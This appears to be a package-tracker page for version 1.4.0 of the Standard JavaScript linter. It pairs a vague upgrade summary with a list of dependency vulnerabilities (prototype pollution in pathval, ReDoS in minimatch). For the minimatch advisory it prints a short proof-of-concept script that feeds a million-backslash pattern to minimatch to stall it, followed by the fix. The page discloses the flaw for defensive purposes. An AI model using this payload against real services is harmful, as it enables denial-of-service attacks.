Standard version 1.4.0 marks a small step from version 1.3.0 in the evolution of this popular JavaScript Standard Style linter. Although the core dependencies remain identical, including glob, jscs, split, jshint, find-root, and minimatch, the update signifies a potential refinement or bug fix. For developers, this means a seamless transition with minimal disruption, keeping the same familiar linting rules and behaviors.
The key difference lies in the releaseDate, version 1.4.0 came one day after 1.3.0. While the absence of listed devDependencies suggests a focus on core linting functionality, the consistent dependencies indicate that the update wasn't about introducing radical changes. It's more likely an incremental improvement, addressing minor issues or polishing existing features.
Developers already using Standard will find the update straightforward, as it doesn't necessitate major configuration changes or code adjustments. Those new to Standard benefit from a stable and predictable linting tool known for its straightforward approach to JavaScript style. Expect no breaking changes, and an easy update path. Overall, upgrading to version 1.4.0 offers a refined experience without overhauling the well-established foundation of JavaScript Standard Style. For new users, especially those seeking a convention-over-configuration style linter, this latest iteration continues to build on the project's reputation for simplicity and maintainability.
All the vulnerabilities related to the version 1.4.0 of the package
Prototype pollution in pathval
A prototype pollution vulnerability affects all versions of package pathval under 1.1.1.
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
var minimatch = require(“minimatch”);
// utility function for generating long strings
var genstr = function (len, chr) {
var result = “”;
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
var exploit = “[!” + genstr(1000000, “\\”) + “A”;
// minimatch exploit.
console.log(“starting minimatch”);
minimatch(“foo”, exploit);
console.log(“finishing minimatch”);
Update to version 3.0.2 or later.
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.